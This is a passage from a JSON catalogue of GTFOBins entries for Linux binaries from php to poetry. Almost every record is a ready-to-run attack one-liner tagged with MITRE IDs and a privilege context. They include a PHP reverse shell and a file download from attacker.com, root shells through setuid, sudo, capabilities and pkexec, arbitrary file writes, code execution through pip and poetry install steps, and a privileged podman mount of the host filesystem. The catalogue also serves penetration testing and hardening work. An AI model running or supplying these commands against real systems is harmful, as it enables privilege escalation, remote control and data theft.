installation","aliases":[]},{"id":"gtfo:php:download:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-read:0:sudo","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-read:0:suid","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-read:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-write:0:sudo","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-write:0:suid","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-write:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:reverse-shell:0:sudo","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:reverse-shell:0:suid","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:reverse-shell:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:0:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:0:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:0:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:1:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:1:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:1:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:1:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:2:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); $h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:2:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:2:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:2:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:3:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:3:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:3:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\", [\"-p\"]);'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:3:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:upload:0:sudo","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:upload:0:suid","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:upload:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:file-read:0:sudo","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:file-read:0:suid","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:file-read:0:unprivileged","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:shell:0:sudo","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:shell:0:suid","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:shell:0:unprivileged","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pidstat:shell:0:sudo","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pidstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pidstat:shell:0:suid","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pidstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pidstat:shell:0:unprivileged","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pidstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pip:inherit:0:sudo","toolId":"gtfo:pip","toolName":"pip","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\npip install --break-system-packages .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```\n\nThe `--break-system-packages` flag can be omitted in older systems.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pip:inherit:0:unprivileged","toolId":"gtfo:pip","toolName":"pip","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\npip install --break-system-packages .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```\n\nThe `--break-system-packages` flag can be omitted in older systems.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pip:shell:0:sudo","toolId":"gtfo:pip","toolName":"pip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pip config --editor '/bin/sh -s' edit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pip:shell:0:unprivileged","toolId":"gtfo:pip","toolName":"pip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pip config --editor '/bin/sh -s' edit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pipx:inherit:0:sudo","toolId":"gtfo:pipx","toolName":"pipx","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/file.py\npipx run /path/to/file.py","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pipx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pipx:inherit:0:unprivileged","toolId":"gtfo:pipx","toolName":"pipx","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/file.py\npipx run /path/to/file.py","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pipx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pkexec:shell:0:sudo","toolId":"gtfo:pkexec","toolName":"pkexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pkexec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pkexec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pkg:command:0:sudo","toolId":"gtfo:pkg","toolName":"pkg","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"pkg install -y --no-repo-update ./x-1.0.txz","description":"Generate the FreeBSD package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t freebsd -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:plymouth:shell:0:sudo","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command=/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/plymouth/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:plymouth:shell:0:suid","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command='/bin/sh -p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/plymouth/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:plymouth:shell:0:unprivileged","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command=/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/plymouth/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:podman:shell:0:sudo","toolId":"gtfo:podman","toolName":"podman","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh","description":"This requires an actual image to be available (e.g., `alpine`) downloading it if not present.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/podman/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:podman:shell:0:unprivileged","toolId":"gtfo:podman","toolName":"podman","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh","description":"This requires an actual image to be available (e.g., `alpine`) downloading it if not present.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/podman/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:poetry:inherit:0:sudo","toolId":"gtfo:poetry","toolName":"poetry","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npoetry run python /path/to/temp-file","description":"This allows to run Python code (`...`).\n\nA valid `pyproject.toml` file must be present in the current working directory, you can create one with `poetry init -n`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/poetry/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:poetry:inherit:0:unprivileged","toolId":"gtfo:poetry","toolName":"poetry","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library 